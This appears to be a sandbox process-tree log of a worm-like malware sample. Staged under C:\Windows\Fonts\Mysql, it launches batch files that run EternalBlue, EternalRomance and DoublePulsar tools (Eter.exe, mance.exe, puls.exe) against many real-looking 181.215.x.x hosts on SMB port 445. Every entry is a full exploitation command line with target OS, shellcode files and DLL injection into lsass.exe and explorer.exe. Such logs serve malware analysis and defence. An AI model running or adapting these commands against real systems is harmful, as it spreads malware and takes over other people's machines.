C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.49 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.49.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:6012
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9424
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8104
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.49 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Location Discovery: System Language Discovery
PID:3260
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:6148
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8572
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.49 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.49.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8232
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8280
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.49 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.563⤵PID:5888
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.56 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.56.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11300
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.56 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.56.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:7780
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:968
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:11480
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.56 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:7724
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:7424
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4816
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.56 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.56.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8796
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8392
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.56 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.1643⤵PID:5760
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.164 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.164.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10720
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.164 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.164.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Location Discovery: System Language Discovery
PID:7956
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10948
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10272
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.164 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5896
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8728
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9508
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.164 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.164.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9572
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9784
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.164 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.243⤵PID:10340
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.24 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.24.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10620
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.24 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.24.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11120
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10596
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.24 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:7300
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:1364
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6056
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.24 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.24.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8412
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8856
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.24 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.15.1173⤵PID:10472
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.15.117 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.15.117.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11428
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.15.117 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.117.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11036
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:11868
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:12192
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.15.117 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:10984
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7688
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7468
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.15.117 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.117.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:4976
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:8244
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.15.117 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.15.1413⤵PID:10608
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.15.141 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.15.141.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10464
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.15.141 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.141.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:12056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.15.1533⤵PID:10976
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.15.153 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.15.153.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- Drops file in Windows directory
PID:11544
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.15.153 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.153.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11876
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12032
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:132
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.15.153 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5912
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8308
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:8740
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.15.153 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.153.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9180
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:9208
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.15.153 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.15.1733⤵PID:2412
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.15.173 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.15.173.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11576
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.15.173 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.173.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:12012
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:11760
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11620
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.15.173 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:892
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7220
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4220
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.15.173 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.173.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8840
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8488
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.15.173 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.15.1903⤵PID:2144
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.15.190 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.15.190.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:6776
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.15.190 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.190.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:10548
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:11584
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:12208
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.15.190 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:11288
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:7284
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6960
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.15.190 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.15.190.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- Drops file in Windows directory
PID:8364
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9128
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.15.190 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:8852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.863⤵PID:10432
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.86 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.86.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- Drops file in Windows directory
- System Time Discovery
PID:4808
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.86 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.86.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- Drops file in Windows directory
PID:11236
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:6104
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11272
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.86 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5020
-
-
